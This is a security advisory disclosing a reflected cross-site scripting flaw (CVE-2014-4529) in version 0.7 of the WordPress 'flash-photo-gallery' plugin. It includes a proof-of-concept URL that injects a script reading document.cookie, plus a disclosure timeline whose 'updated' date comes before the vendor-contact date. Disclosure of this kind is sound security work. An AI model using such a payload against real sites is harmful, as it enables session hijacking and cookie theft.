wp-plugin : flash-photo-gallery

Plugin Details
Plugin Name: wp-plugin : flash-photo-gallery
Effected Version : 0.7 (and most probably lower version's if any)
Vulnerability : Cross-Site Scripting (XSS)
Identified by : prajalkulkarni
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Unauthenticated
PoC - (Proof of Concept) :

http://127.0.0.1/wordpress/wp-content/wp-plugs/flashphotogallery/fpg_preview.php?path=path%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/


Disclosure Timeline
Vendor Contacted : 2014-01-21
Plugin Status : Updated on 2014-01-11
Public Disclosure : May 25, 2014
CVE Number : [CVE-2014-4529]
Plugin Description :
[| Creates a Flash Photo Gallery like one provided in Adobe Photoshop CS2 Flash Web Photo Gallery templates. Features include: 1. Compatible with Wordpress and Wordpress MU. 1. Create and manage multiple Flash Photo Galleries. 1. Customize galleries by specifying titles, colors, thumbnail size and a lot more options. 1. Uses the wordpress built-in media uploader (media-upload.php) to add photos to. 1. Multiple photo galleries can be added in any page or post using a simple short code. 1. Uses SWFObject (http://code.google.com/p/swfobject/) for embedding swf Height and width of the gallery swf can be (optionally) specified using the shortcode - `[fpg id="<XMLFILE>" height="<PIXELS>" width="<PIXELS>"]` Note: In versions prior to 2.7 Flash Photo Gallery is displayed under the Page menu. In 2.7 and later versions, it is displayed under Media. Demo Photo Gallery: [http://webdlabs.com/projects/flash-photo-gallery/](http://webdlabs.com/projects/flash-photo-gallery/) = Whats new in 0.7? = Height and width of the gallery swf can be (optionally) specified using the shortcode ]